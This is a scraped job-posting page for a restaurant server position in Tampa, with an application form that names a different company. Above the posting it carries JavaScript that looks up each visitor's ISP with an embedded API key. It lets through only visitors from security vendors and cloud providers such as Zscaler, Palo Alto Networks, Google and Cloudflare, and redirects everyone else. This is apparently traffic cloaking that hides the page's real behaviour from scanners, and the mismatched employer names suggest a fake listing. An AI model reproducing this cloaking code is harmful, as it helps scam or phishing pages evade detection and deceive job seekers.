Server

Server

Overview


const ipAddress = data.ip;

// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;

// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));

if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ''; } }) .catch(error => { console.error('Error retrieving ISP name:', error); }); }) .catch(error => { console.error('Error retrieving IP address or location:', error); });

Join our vibrant team as a Server at Puff N Stuff in Tampa, Florida!

As a Server, you will be the key to providing exceptional dining experiences for our guests.

  • Greet and seat guests warmly, presenting menus and answering questions about menu items.
  • Take accurate orders and relay them efficiently to the kitchen staff.
  • Serve food and beverages promptly, ensuring quality and presentation standards are met.
  • Monitor guest satisfaction, address concerns promptly, and ensure a positive experience.
  • Maintain cleanliness and organization of tables and service areas.
  • Collaborate with team members to ensure smooth restaurant operations.

Skills needed include excellent communication, friendly attitude, multitasking ability, and attention to detail.

Benefits include flexible scheduling, competitive wages, dining discounts, and a supportive work environment.

Emploment Location
Florida, Tampa

Apply to Join Progression Transport.

*
*
* Attach your resume. Max size 2mb Allowed Types: pdf